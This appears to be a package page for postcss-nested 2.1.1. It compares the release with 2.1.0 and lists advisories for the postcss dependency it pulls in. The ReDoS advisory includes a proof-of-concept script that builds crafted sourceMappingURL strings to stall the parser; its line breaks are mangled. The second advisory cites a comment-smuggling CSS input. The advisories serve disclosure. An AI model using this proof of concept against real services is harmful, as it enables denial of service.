PostCSS Nested is a valuable tool for developers seeking to enhance their CSS workflow by enabling Sass-like nested rules within their PostCSS environment. Version 2.1.1 builds upon the solid foundation of version 2.1.0, offering subtle but important improvements that contribute to a smoother development experience.
A key distinction between the two versions lies in their dependencies. Version 2.1.1 upgrades the postcss dependency from ^6.0.8 to ^6.0.9. This might contain subtle bug fixes and performance improvements within PostCSS itself, potentially leading to marginal gains in processing speed and compatibility. Additionally, version 2.1.1 includes a bump in eslint from ^4.3.0 to ^4.4.1 inside the devDependencies. While subtle, updates between minor versions often include bug fixes and better support for newer ES features, potentially leading to a more robust and reliable linting process during development.
Both versions retain the core functionality of unwrapping nested rules, mirroring Sass's intuitive syntax for organizing styles. Developers familiar with Sass will find PostCSS Nested immediately accessible, allowing them to write cleaner, more maintainable CSS. The MIT license ensures the library is free to use in commercial and personal projects. With a well-defined repository and active maintenance by Andrey Sitnik, PostCSS Nested offers a dependable solution for streamlining CSS development.
All the vulnerabilities related to the version 2.1.1 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.